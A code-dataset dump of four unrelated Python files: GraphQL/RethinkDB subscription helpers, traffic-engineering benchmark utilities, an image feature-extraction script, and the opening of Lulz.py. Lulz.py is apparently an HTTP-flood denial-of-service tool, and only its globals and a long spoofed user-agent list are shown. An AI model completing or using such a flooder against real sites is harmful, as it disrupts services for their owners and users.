| 1.289063 | 1 |
backend/handlers/graphql/utils/subscription.py | al-indigo/vmemperor | 0 | 12797440 | <filename>backend/handlers/graphql/utils/subscription.py
import asyncio
from dataclasses import dataclass
from typing import Dict, Type
import graphene
from graphene import ObjectType
from graphene.types.resolver import dict_resolver
from graphql import ResolveInfo
from rethinkdb import RethinkDB
from rethinkdb.errors import ReqlOpFailedError
from rx import Observable
from enum import Enum
import constants.re as re
from authentication import BasicAuthenticator
from connman import ReDBConnection
from handlers.graphql.types.deleted import Deleted
from handlers.graphql.utils.querybuilder.changefeedbuilder import ChangefeedBuilder
from handlers.graphql.utils.querybuilder.get_fields import get_fields
from utils.user import user_entities
from xenadapter.xenobject import XenObject
from xenadapter.aclxenobject import ACLXenObject
class Change(graphene.Enum):
Initial = 'initial'
Add = 'add'
Remove = 'remove'
Change = 'change'
def str_to_changetype(s: str) -> Change:
if s == 'initial':
return Change.Initial
elif s == 'add':
return Change.Add
elif s == 'remove':
return Change.Remove
elif s == 'change':
return Change.Change
else:
raise ValueError(f"No such ChangeType: {s}")
@dataclass
class TaskCounter:
task : asyncio.Task
count = 1
async def create_single_changefeeds(queue: asyncio.Queue, info: ResolveInfo, user_authenticator : BasicAuthenticator, xenobject_type: Type[XenObject], with_initials : bool, filter_function=None):
async with ReDBConnection().get_async_connection() as conn:
tasks: Dict[str, TaskCounter] = {}
try:
if not user_authenticator or user_authenticator.is_admin() or not issubclass(xenobject_type, ACLXenObject):
table = re.db.table(xenobject_type.db_table_name)
else:
table = re.db.table(f'{xenobject_type.db_table_name}_user').get_all(*[entity for entity in user_entities(user_authenticator)], index='userid')
changes = await table.pluck('ref').changes(include_types=True, include_initial=True).run(conn)
while True:
try:
change = await changes.next()
except ReqlOpFailedError:
return
if not change:
break
if change['type'] == 'remove':
value = change['old_val']
task_counter = tasks[value['ref']]
task_counter.count -= 1
if task_counter.count == 0:
if not task_counter.task.done():
task_counter.task.cancel()
await queue.put({
'type': 'remove',
'old_val':
{
'ref' : value['ref']
}
})
del tasks[value['ref']]
elif change['type'] == 'change':
print(f"Ref change?: {change}")
continue
else:
value = change['new_val']
if filter_function and not (await filter_function(value['ref'], conn)):
continue
builder = ChangefeedBuilder(id=value['ref'],
info=info,
queue=queue,
additional_string=None,
select_subfield=['value'], # { value : {...} <-- this is what we need in info
status=change['type'],
ignore_initials=not with_initials)
if not value['ref'] in tasks:
tasks[value['ref']] = TaskCounter(task=asyncio.create_task(builder.put_values_in_queue()))
else:
tasks[value['ref']].count += 1
except asyncio.CancelledError:
for task_counter in tasks.values():
task_counter.task.cancel()
return
except Exception as e:
import sentry_sdk
sentry_sdk.capture_exception(e)
return
def MakeSubscriptionWithChangeType(_class : type) -> type:
"""
Create a subscription type with change tracking. If an object is deleted and it's a XenObject, only its ref is returned
:param _class: GraphQL type to track changes on
:return: GraphQL Union type: _class OR Deleted
"""
class Meta:
types = (_class, Deleted, )
change_type = type(f'{_class.__name__}OrDeleted', (graphene.Union, ), {
"Meta": Meta,
})
class Meta:
default_resolver = dict_resolver
return type(f'{_class.__name__}sSubscription',
(ObjectType, ),
{
'change_type': graphene.Field(Change, required=True, description="Change type"),
'value': graphene.Field(change_type, required=True),
'Meta': Meta
})
def MakeSubscription(_class : type) -> type:
'''
Creates a subscription type for resolve_item_by_pkey
This is suitable when one wants to subscribe to changes for one particular item
:param _class:
:return:
'''
#return type(f'{_class.__name__}Subscription',
# (ObjectType, ),
# {
# _class.__name__: graphene.Field(_class)
# })
return _class
def resolve_xen_item_by_key(key_name:str = 'ref'):
"""
Returns an asynchronous function that resolves every change in RethinkDB table with item with said primary key
If item is deleted or does not exist, returns null in place of an item
:param item_class: A GraphQL object type that has the same shape as a table
:param table: a RethinkDB table to retrieve updates from
:return: function that returns Observable. Works with asyncio
"""
def resolve_item(root, info, **args) -> Observable:
'''
Create a field with MakeSubscription(type)
:param root:
:param info:
:param args:
:return:
'''
async def iterable_to_item():
key = args.get(key_name, None)
if not key:
yield None
return
builder = ChangefeedBuilder(key, info)
async for change in builder.yield_values():
if not change:
break
if change['type'] == 'remove' or change['new_val'] is None:
yield None
continue
else:
value = change['new_val']
yield value
return Observable.from_future(iterable_to_item())
return resolve_item
def resolve_all_xen_items_changes(item_class: type, filter_function=None):
"""
Returns an asynchronous function that resolves every change in RethinkDB table
:param item_class: GraphQL object type that has same shape as a table
:param filter_function: this function is given a ref of potential subscription candidate (0th arg) and an asyncio connection to work with DB (1st arg).
This function should return true or false answering whether we should include this item in our subscripion
resolve_vdis is usage example.
Bear in mind that this function is called only once when a new item is added, and with all initial items
:return:
"""
def resolve_items(root, info : ResolveInfo, with_initials : bool, **kwargs) -> Observable:
'''
Returns subscription updates with the following shape:
{
changeType: one of Initial, Add, Mod, Remove
value: of type item_class
}
Create a field with MakeSubscriptionWithChangeType(type)
:param info:
:param with_initials: Supply subscription with initial values (default: False). Use True, when a Subscription is not used as a backer for Query
'''
async def iterable_to_items():
fields_for_return_type = get_fields(info, ['value'])
xenobject_type = fields_for_return_type['_xenobject_type_']
queue = asyncio.Queue()
authenticator = info.context.user_authenticator
creator_task = asyncio.create_task(create_single_changefeeds(queue, info, authenticator, xenobject_type, with_initials, filter_function))
try:
while True:
change = await queue.get()
if change['type'] == 'remove':
value = change['old_val']
value['__typename'] = 'Deleted'
else:
value = change['new_val']
value['__typename'] = item_class.__name__
yield dict(change_type=str_to_changetype(change['type']),
value=value)
except asyncio.CancelledError:
creator_task.cancel()
return
return Observable.from_future(iterable_to_items())
return resolve_items
def resolve_item_by_key(item_class: type, table_name : str, key_name:str = 'ref'):
"""
Returns an asynchronous function that resolves every change in RethinkDB table with item with said primary key
If item is deleted or does not exist, returns null in place of an item
:param item_class: A GraphQL object type that has the same shape as a table
:param table: a RethinkDB table to retrieve updates from
:return: function that returns Observable. Works with asyncio
"""
def resolve_item(root, info, **args) -> Observable:
'''
Create a field with MakeSubscription(type)
:param root:
:param info:
:param args:
:return:
'''
async def iterable_to_item():
async with ReDBConnection().get_async_connection() as conn:
key = args.get(key_name, None)
if not key:
yield None
return
table = re.db.table(table_name)
changes = await table.get_all(key) \
.pluck(*item_class._meta.fields)\
.changes(include_types=True, include_initial=True).run(conn)
while True:
change = await changes.next()
if not change:
break
if change['type'] == 'remove' or change['new_val'] is None:
yield None
continue
else:
value = change['new_val']
yield item_class(**value)
return Observable.from_future(iterable_to_item())
return resolve_item
def resolve_all_items_changes(item_class: type, table_name : str):
"""
Returns an asynchronous function that resolves every change in RethinkDB table
:param item_class: GraphQL object type that has same shape as a table
:param table: RethinkDB table
:return:
"""
def resolve_items(root, info, with_initials: bool) -> Observable:
'''
Returns subscription updates with the following shape:
{
changeType: one of Initial, Add, Mod, Remove
value: of type item_class
}
Create a field with MakeSubscriptionWithChangeType(type)
:param info:
:return:
'''
async def iterable_to_items():
async with ReDBConnection().get_async_connection() as conn:
table = re.db.table(table_name)
changes = await table.pluck(*item_class._meta.fields.keys()).changes(include_types=True, include_initial=with_initials).run(conn)
while True:
change = await changes.next()
if not change:
break
if change['type'] == 'remove':
value = change['old_val']
else:
value = change['new_val']
value = item_class(**value)
yield MakeSubscriptionWithChangeType(item_class)(change_type=str_to_changetype(change['type']),
value=value)
return Observable.from_future(iterable_to_items())
return resolve_items
| 1.570313 | 2 |
traffic_engineering/benchmarks/benchmark_helpers.py | stanford-futuredata/POP | 15 | 12797448 | <gh_stars>10-100
from collections import defaultdict
from glob import iglob
import argparse
import os
import sys
sys.path.append("..")
from lib.partitioning import FMPartitioning, SpectralClustering
PROBLEM_NAMES = [
"GtsCe.graphml",
"UsCarrier.graphml",
"Cogentco.graphml",
"Colt.graphml",
"TataNld.graphml",
"Deltacom.graphml",
"DialtelecomCz.graphml",
"Kdl.graphml",
]
TM_MODELS = [
"uniform",
"gravity",
"bimodal",
"poisson-high-intra",
"poisson-high-inter",
]
SCALE_FACTORS = [1.0, 2.0, 4.0, 8.0, 16.0, 32.0, 64.0, 128.0]
PATH_FORM_HYPERPARAMS = (4, True, "inv-cap")
NCFLOW_HYPERPARAMS = {
"GtsCe.graphml": (4, True, "inv-cap", FMPartitioning, 3),
"UsCarrier.graphml": (4, True, "inv-cap", FMPartitioning, 3),
"Cogentco.graphml": (4, True, "inv-cap", FMPartitioning, 3),
"Colt.graphml": (4, True, "inv-cap", FMPartitioning, 3),
"TataNld.graphml": (4, True, "inv-cap", FMPartitioning, 3),
"Deltacom.graphml": (4, True, "inv-cap", FMPartitioning, 3),
"DialtelecomCz.graphml": (4, True, "inv-cap", FMPartitioning, 3),
"Uninett2010.graphml": (4, True, "inv-cap", FMPartitioning, 3),
"Interoute.graphml": (4, True, "inv-cap", SpectralClustering, 2),
"Ion.graphml": (4, True, "inv-cap", FMPartitioning, 3),
"Kdl.graphml": (4, True, "inv-cap", FMPartitioning, 3),
"erdos-renyi-1260231677.json": (4, True, "inv-cap", FMPartitioning, 3),
}
PROBLEM_NAMES_AND_TM_MODELS = [
(prob_name, tm_model) for prob_name in PROBLEM_NAMES for tm_model in TM_MODELS
]
PROBLEMS = []
GROUPED_BY_PROBLEMS = defaultdict(list)
HOLDOUT_PROBLEMS = []
GROUPED_BY_HOLDOUT_PROBLEMS = defaultdict(list)
for problem_name in PROBLEM_NAMES:
if problem_name.endswith(".graphml"):
topo_fname = os.path.join("..", "topologies", "topology-zoo", problem_name)
else:
topo_fname = os.path.join("..", "topologies", problem_name)
for model in TM_MODELS:
for tm_fname in iglob(
"../traffic-matrices/{}/{}*_traffic-matrix.pkl".format(model, problem_name)
):
vals = os.path.basename(tm_fname)[:-4].split("_")
_, traffic_seed, scale_factor = vals[1], int(vals[2]), float(vals[3])
GROUPED_BY_PROBLEMS[(problem_name, model, scale_factor)].append(
(topo_fname, tm_fname)
)
PROBLEMS.append((problem_name, topo_fname, tm_fname))
for tm_fname in iglob(
"../traffic-matrices/holdout/{}/{}*_traffic-matrix.pkl".format(
model, problem_name
)
):
vals = os.path.basename(tm_fname)[:-4].split("_")
_, traffic_seed, scale_factor = vals[1], int(vals[2]), float(vals[3])
GROUPED_BY_HOLDOUT_PROBLEMS[(problem_name, model, scale_factor)].append(
(topo_fname, tm_fname)
)
HOLDOUT_PROBLEMS.append((problem_name, topo_fname, tm_fname))
GROUPED_BY_PROBLEMS = dict(GROUPED_BY_PROBLEMS)
for key, vals in GROUPED_BY_PROBLEMS.items():
GROUPED_BY_PROBLEMS[key] = sorted(vals)
GROUPED_BY_HOLDOUT_PROBLEMS = dict(GROUPED_BY_HOLDOUT_PROBLEMS)
for key, vals in GROUPED_BY_HOLDOUT_PROBLEMS.items():
GROUPED_BY_HOLDOUT_PROBLEMS[key] = sorted(vals)
def get_problems(args):
problems = []
for (
(problem_name, tm_model, scale_factor),
topo_and_tm_fnames,
) in GROUPED_BY_PROBLEMS.items():
for slice in args.slices:
if (
("all" in args.topos or problem_name in args.topos)
and ("all" in args.tm_models or tm_model in args.tm_models)
and ("all" in args.scale_factors or scale_factor in args.scale_factors)
):
topo_fname, tm_fname = topo_and_tm_fnames[slice]
problems.append((problem_name, topo_fname, tm_fname))
return problems
def get_args_and_problems(output_csv_template, additional_args=[]):
parser = argparse.ArgumentParser()
parser.add_argument("--dry-run", dest="dry_run", action="store_true", default=False)
parser.add_argument("--obj", type=str, choices=["total_flow", "mcf"], required=True)
parser.add_argument(
"--tm-models", type=str, choices=TM_MODELS + ["all"], nargs="+", default="all",
)
parser.add_argument(
"--topos", type=str, choices=PROBLEM_NAMES + ["all"], nargs="+", default="all",
)
parser.add_argument(
"--scale-factors",
type=lambda x: x if x == "all" else float(x),
choices=SCALE_FACTORS + ["all"],
nargs="+",
default="all",
)
parser.add_argument(
"--slices", type=int, choices=range(5), nargs="+", required=True
)
for additional_arg in additional_args:
name_or_flags, kwargs = additional_arg[0], additional_arg[1]
parser.add_argument(name_or_flags, **kwargs)
args = parser.parse_args()
slice_str = "slice_" + "_".join(str(i) for i in args.slices)
output_csv = output_csv_template.format(args.obj, slice_str)
return args, output_csv, get_problems(args)
def print_(*args, file=None):
if file is None:
file = sys.stdout
print(*args, file=file)
file.flush()
| 1.296875 | 1 |
result_generator/result_feature_db/index_sift_color.py | shijack/feature_extract | 1 | 12797456 | # coding=utf-8
import os
import shutil
import time
def get_dirs_child(path):
return [os.path.join(path, f) for f in os.listdir(path)]
def get_all_files_suffix(path, file_suffix='.jpg'):
all_file = []
for dirpath, dirnames, filenames in os.walk(path):
for name in filenames:
if name.endswith(file_suffix):
all_file.append(os.path.join(dirpath, name))
return all_file
def copyFiles(file_imgs, targetDir):
list_imgs = []
with open(file_imgs, 'r') as f:
list_imgs_tmp = f.readlines()
for item_img in list_imgs_tmp:
list_imgs.append(
item_img.split(' ')[0].replace('/opt/Datasets/Datasets/ccweb_video/dataset_ccweb/trans_imgs',
'/Data/Datasets/ccweb_video/dataset_ccweb/trans_imgs').strip())
if not os.path.exists(targetDir):
os.makedirs(targetDir)
for eachfile in list_imgs:
if not os.path.exists(eachfile):
print "src path not exist:" + eachfile
print "error!! attation!"
return -1
shutil.copy(eachfile, targetDir + os.path.basename(eachfile))
print eachfile + " copy succeeded!"
cmd = '/usr/local/bin/videofpget_bow_hash /opt/dongsl/keyframe/10732a0e6a0edef9dcbb2155236e46a7ed5047c0/ 1 4 /retrieval/VideoDNA/VideoRetrival/bins/centers128_32sift.bin /retrieval/VideoDNA/VideoRetrival/bins/ITQ_32_dim800.bin /opt/a.bow /opt/dongsl/a.hash'
'/usr/local/bin/videofpget_bow_hash /opt/dongsl/trans_imgs/add_text 1 26069 /retrieval/VideoDNA/VideoRetrival/bins/centers128_32sift.bin /retrieval/VideoDNA/VideoRetrival/bins/ITQ_32_dim800.bin /opt/dongsl/t.bow /opt/dongsl/t.hash'
def feature_generator_sift_color(dir_img):
dir_child_list = get_dirs_child(dir_img)
print "--------------------------------------------------"
print " feature extraction starts"
print "--------------------------------------------------"
start_time = time.time()
for i, img_path in enumerate(dir_child_list):
names = []
img_names = get_all_files_suffix(img_path)
for j, item_name in enumerate(img_names):
names.append(item_name)
newname = os.path.dirname(item_name) + '/%05d' % (j + 1)
os.rename(item_name, newname + ".jpg")
img_names = get_all_files_suffix(img_path)
print len(img_names)
fp_pick = '/usr/local/bin/videofpget_bow_hash ' + img_path + '/ 1 ' + str(len(
img_names)) + ' /retrieval/VideoDNA/VideoRetrival/bins/centers128_32sift.bin /retrieval/VideoDNA/VideoRetrival/bins/ITQ_32_dim800.bin ' + os.path.dirname(
img_path) + '/' + img_path.split('/')[-1] + '.bow ' + os.path.dirname(img_path) + '/' + img_path.split('/')[
-1] + '.hash'
os.system(fp_pick)
with open(os.path.dirname(img_path) + '/' + img_path.split('/')[-1] + '_img_names.txt', 'w') as name_file:
name_file.writelines(names)
print "extracting feature from image No. %d , %d dirs in total" % ((i + 1), len(dir_child_list))
end_time = time.time()
print ("final_feature extract time:", (end_time - start_time))
print "--------------------------------------------------"
print " feature extraction ends ..."
print "--------------------------------------------------"
def feature_generator_query(target_dir):
'''
根据图片文件列表,获取线上系统 查询视频帧 .bow .hash .txt 信息
:param target_dir: endswith /
:return:
'''
copyFiles('./test_2000.txt', target_dir)
feature_generator_sift_color(dir_img=os.path.abspath(os.path.join(os.path.dirname(target_dir), '../')))
if __name__ == "__main__":
query_dir_imgs = '/opt/dongsl/tmp2/tmp/'
feature_generator_query(query_dir_imgs)
| 1.984375 | 2 |
Lulz.py | kami4/Lulz.pl | 0 | 12797464 | <gh_stars>0
import urllib2
import sys
import threading
import random
import re
#global params
url=''
host=''
headers_useragents=[]
headers_referers=[]
request_counter=0
flag=0
safe=0
def inc_counter():
global request_counter
request_counter+=1
def set_flag(val):
global flag
flag=val
def set_safe():
global safe
safe=1
# generates a user agent array
def useragent_list():
global headers_useragents
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) BlackHawk/1.0.195.0 Chrome/127.0.0.1 Safari/62439616.534')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
headers_useragents.append('Mozilla/5.0 (PlayStation 4 1.52) AppleWebKit/536.26 (KHTML, like Gecko)')
headers_useragents.append('Mozilla/5.0 (Windows NT 6.1; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)')
headers_useragents.append('Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)')
headers_useragents.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) BlackHawk/1.0.195.0 Chrome/127.0.0.1 Safari/62439616.534')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
headers_useragents.append('Mozilla/5.0 (PlayStation 4 1.52) AppleWebKit/536.26 (KHTML, like Gecko)')
headers_useragents.append('Mozilla/5.0 (Windows NT 6.1; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)')
headers_useragents.append('Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)')
headers_useragents.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51')
headers_useragents.append('agadine/1.x.x (+http://www.agada.de)')
headers_useragents.append('Agent-SharewarePlazaFileCheckBot/2.0+(+http://www.SharewarePlaza.com)')
headers_useragents.append('AgentName/0.1 libwww-perl/5.48')
headers_useragents.append('AIBOT/2.1 By +(www.21seek.com A Real artificial intelligence search engine China)')
headers_useragents.append('AideRSS/1.0 (aiderss.com)')
headers_useragents.append('aipbot/1.0 (aipbot; http://www.aipbot.com; <EMAIL>)')
headers_useragents.append('aipbot/2-beta (aipbot dev; http://aipbot.com; <EMAIL>)')
headers_useragents.append('Akregator/1.2.9; librss/remnants')
headers_useragents.append('Aladin/3.324')
headers_useragents.append('Alcatel-BG3/1.0 UP.Browser/5.0.3.1.2')
headers_useragents.append('Aleksika Spider/1.0 (+http://www.aleksika.com/)')
headers_useragents.append('AlertInfo 2.0 (Powered by Newsbrain)')
headers_useragents.append('AlkalineBOT/1.3')
headers_useragents.append('AlkalineBOT/1.4 (1.4.0326.0 RTM)')
headers_useragents.append('Allesklar/0.1 libwww-perl/5.46')
headers_useragents.append('Alligator 1.31 (www.nearsoftware.com)')
headers_useragents.append('Allrati/1.1 (+)')
headers_useragents.append('AltaVista Intranet V2.0 AVS EVAL <EMAIL>')
headers_useragents.append('AltaVista Intranet V2.0 Compaq Altavista Eval <EMAIL>')
headers_useragents.append('AltaVista Intranet V2.0 evreka.com <EMAIL>')
headers_useragents.append('AltaVista V2.0B <EMAIL>')
headers_useragents.append('amaya/x.xx libwww/x.x.x')
headers_useragents.append('AmfibiBOT')
headers_useragents.append('Amfibibot/0.06 (Amfibi Web Search; http://www.amfibi.com; <EMAIL>)')
headers_useragents.append('Amfibibot/0.07 (Amfibi Robot; http://www.amfibi.com; <EMAIL>)')
headers_useragents.append('amibot')
headers_useragents.append('Amiga-AWeb/3.4.167SE')
headers_useragents.append('AmigaVoyager/3.4.4 (MorphOS/PPC native)')
headers_useragents.append('AmiTCP Miami (AmigaOS 2.04)')
headers_useragents.append('Amoi 8512/R21.0 NF-Browser/3.3')
headers_useragents.append('amzn_assoc')
headers_useragents.append('AnnoMille spider 0.1 alpha - http://www.annomille.it')
headers_useragents.append('annotate_google; http://ponderer.org/download/annotate_google.user.js')
headers_useragents.append('Anonymized by ProxyOS: http://www.megaproxy.com')
headers_useragents.append('Anonymizer/1.1')
headers_useragents.append('AnswerBus (http://www.answerbus.com/)')
headers_useragents.append('AnswerChase PROve x.0')
headers_useragents.append('AnswerChase x.0')
headers_useragents.append('ANTFresco/x.xx')
headers_useragents.append('antibot-V1.1.5/i586-linux-2.2')
headers_useragents.append('AnzwersCrawl/2.0 (<EMAIL>;Engine)')
headers_useragents.append('Apexoo Spider 1.x')
headers_useragents.append('Aplix HTTP/1.0.1')
headers_useragents.append('Aplix_SANYO_browser/1.x (Japanese)')
headers_useragents.append('Aplix_SEGASATURN_browser/1.x (Japanese)')
headers_useragents.append('Aport')
headers_useragents.append('appie 1.1 (www.walhello.com)')
headers_useragents.append('agadine/1.x.x (+http://www.agada.de)')
headers_useragents.append('Agent-SharewarePlazaFileCheckBot/2.0+(+http://www.SharewarePlaza.com)')
headers_useragents.append('AgentName/0.1 libwww-perl/5.48')
headers_useragents.append('AIBOT/2.1 By +(www.21seek.com A Real artificial intelligence search engine China)')
headers_useragents.append('AideRSS/1.0 (aiderss.com)')
headers_useragents.append('aipbot/1.0 (aipbot; http://www.aipbot.com; a<EMAIL>)')
headers_useragents.append('aipbot/2-beta (aipbot dev; http://aipbot.com; a<EMAIL>)')
headers_useragents.append('Akregator/1.2.9; librss/remnants')
headers_useragents.append('Aladin/3.324')
headers_useragents.append('Alcatel-BG3/1.0 UP.Browser/5.0.3.1.2')
headers_useragents.append('Aleksika Spider/1.0 (+http://www.aleksika.com/)')
headers_useragents.append('AlertInfo 2.0 (Powered by Newsbrain)')
headers_useragents.append('AlkalineBOT/1.3')
headers_useragents.append('AlkalineBOT/1.4 (1.4.0326.0 RTM)')
headers_useragents.append('Allesklar/0.1 libwww-perl/5.46')
headers_useragents.append('Alligator 1.31 (www.nearsoftware.com)')
headers_useragents.append('Allrati/1.1 (+)')
headers_useragents.append('AltaVista Intranet V2.0 AVS EVAL <EMAIL>')
headers_useragents.append('AltaVista Intranet V2.0 Compaq Altavista Eval <EMAIL>')
headers_useragents.append('AltaVista Intranet V2.0 evreka.com <EMAIL>')
headers_useragents.append('AltaVista V2.0B <EMAIL>')
headers_useragents.append('amaya/x.xx libwww/x.x.x')
headers_useragents.append('AmfibiBOT')
headers_useragents.append('Amfibibot/0.06 (Amfibi Web Search; http://www.amfibi.com; <EMAIL>)')
headers_useragents.append('Amfibibot/0.07 (Amfibi Robot; http://www.amfibi.com; <EMAIL>)')
headers_useragents.append('amibot')
headers_useragents.append('Amiga-AWeb/3.4.167SE')
headers_useragents.append('AmigaVoyager/3.4.4 (MorphOS/PPC native)')
headers_useragents.append('AmiTCP Miami (AmigaOS 2.04)')
headers_useragents.append('Amoi 8512/R21.0 NF-Browser/3.3')
headers_useragents.append('amzn_assoc')
headers_useragents.append('AnnoMille spider 0.1 alpha - http://www.annomille.it')
headers_useragents.append('annotate_google; http://ponderer.org/download/annotate_google.user.js')
headers_useragents.append('Anonymized by ProxyOS: http://www.megaproxy.com')
headers_useragents.append('Anonymizer/1.1')
headers_useragents.append('AnswerBus (http://www.answerbus.com/)')
headers_useragents.append('AnswerChase PROve x.0')
headers_useragents.append('AnswerChase x.0')
headers_useragents.append('ANTFresco/x.xx')
headers_useragents.append('antibot-V1.1.5/i586-linux-2.2')
headers_useragents.append('AnzwersCrawl/2.0 (<EMAIL>;Engine)')
headers_useragents.append('Apexoo Spider 1.x')
headers_useragents.append('Aplix HTTP/1.0.1')
headers_useragents.append('Aplix_SANYO_browser/1.x (Japanese)')
headers_useragents.append('Aplix_SEGASATURN_browser/1.x (Japanese)')
headers_useragents.append('Aport')
headers_useragents.append('appie 1.1 (www.walhello.com)')
headers_useragents.append('Apple iPhone v1.1.4 CoreMedia v1.0.0.4A102')
headers_useragents.append('Apple-PubSub/65.1.1')
headers_useragents.append('ArabyBot (compatible; Mozilla/5.0; GoogleBot; FAST Crawler 6.4; http://www.araby.com;)')
headers_useragents.append('ArachBot')
headers_useragents.append('Arachnoidea (<EMAIL>)')
headers_useragents.append('aranhabot')
headers_useragents.append('ArchitextSpider')
headers_useragents.append('archive.org_bot')
headers_useragents.append('Argus/1.1 (Nutch; http://www.simpy.com/bot.html; feedback at simpy dot com)')
headers_useragents.append('Arikus_Spider')
headers_useragents.append('Arquivo-web-crawler (compatible; heritrix/1.12.1 +http://arquivo-web.fccn.pt)')
headers_useragents.append('ASAHA Search Engine Turkey V.001 (http://www.asaha.com/)')
headers_useragents.append('Asahina-Antenna/1.x')
headers_useragents.append('Asahina-Antenna/1.x (libhina.pl/x.x ; libtime.pl/x.x)')
headers_useragents.append('ask.24x.info')
headers_useragents.append('AskAboutOil/0.06-rcp (Nutch; http://www.nutch.org/docs/en/bot.html; nutch-agent@<EMAIL>)')
headers_useragents.append('asked/Nutch-0.8 (web crawler; http://asked.jp; epicurus at gmail dot com)')
headers_useragents.append('ASPSeek/1.2.5')
headers_useragents.append('ASPseek/1.2.9d')
headers_useragents.append('ASPSeek/1.2.x')
headers_useragents.append('ASPSeek/1.2.xa')
headers_useragents.append('ASPseek/1.2.xx')
headers_useragents.append('ASPSeek/1.2.xxpre')
headers_useragents.append('ASSORT/0.10')
headers_useragents.append('asterias/2.0')
headers_useragents.append('AtlocalBot/1.1 +(http://www.atlocal.com/local-web-site-owner.html)')
headers_useragents.append('Atomic_Email_Hunter/4.0')
headers_useragents.append('Atomz/1.0')
headers_useragents.append('atSpider/1.0')
headers_useragents.append('Attentio/Nutch-0.9-dev (Attentios beta blog crawler; www.attentio.com; <EMAIL>)')
headers_useragents.append('AU-MIC/2.0 MMP/2.0')
headers_useragents.append('AUDIOVOX-SMT5600')
headers_useragents.append('augurfind')
headers_useragents.append('augurnfind V-1.x')
headers_useragents.append('autoemailspider')
headers_useragents.append('autohttp')
headers_useragents.append('autowebdir 1.1 (www.autowebdir.com)')
headers_useragents.append('AV Fetch 1.0')
headers_useragents.append('Avant Browser (http://www.avantbrowser.com)')
headers_useragents.append('AVSearch-1.0(<EMAIL>)')
headers_useragents.append('AVSearch-2.0-fusionIdx-14-CompetitorWebSites')
headers_useragents.append('AVSearch-3.0(AltaVista/AVC)')
headers_useragents.append('AWeb')
headers_useragents.append('axadine/ (Axadine Crawler; http://www.axada.de/; )')
headers_useragents.append('AxmoRobot - Crawling your site for better indexing on www.axmo.com search engine.')
headers_useragents.append('Azureus 2.x.x.x')
headers_useragents.append('BabalooSpider/1.3 (BabalooSpider; http://www.babaloo.si; <EMAIL>)')
headers_useragents.append('BaboomBot/1.x.x (+http://www.baboom.us)')
headers_useragents.append('BackStreet Browser 3.x')
headers_useragents.append('BaiduImagespider+(+http://www.baidu.jp/search/s308.html)')
headers_useragents.append('BaiDuSpider')
headers_useragents.append('Baiduspider+(+http://help.baidu.jp/system/05.html)')
headers_useragents.append('Baiduspider+(+http://www.baidu.com/search/spider.htm)')
headers_useragents.append('Baiduspider+(+http://www.baidu.com/search/spider_jp.html)')
headers_useragents.append('Balihoo/Nutch-1.0-dev (Crawler for Balihoo.com search engine - obeys robots.txt and robots meta tags ; http://balihoo.com/index.aspx; robot at balihoo dot com)')
headers_useragents.append('BanBots/1.2 (<EMAIL>)')
headers_useragents.append('Barca/2.0.xxxx')
headers_useragents.append('(DreamPassport/3.0; isao/MyDiGiRabi)')
headers_useragents.append('(Privoxy/1.0)')
headers_useragents.append('*/Nutch-0.9-dev')
headers_useragents.append('+SitiDi.net/SitiDiBot/1.0 (+Have Good Day)')
headers_useragents.append('-DIE-KRAEHE- META-SEARCH-ENGINE/1.1 http://www.die-kraehe.de')
headers_useragents.append('123spider-Bot (Version: 1.02) powered by www.123spider.de')
headers_useragents.append('192.comAgent')
headers_useragents.append('1st ZipCommander (Net) - http://www.zipcommander.com/')
headers_useragents.append('2Bone_LinkChecker/1.0 libwww-perl/5.64')
headers_useragents.append('4anything.com LinkChecker v2.0')
headers_useragents.append('8484 Boston Project v 1.0')
headers_useragents.append(':robot/1.0 (linux) ( admin e-mail: undefined http://www.neofonie.de/loesungen/search/robot.html )')
headers_useragents.append('A-Online Search')
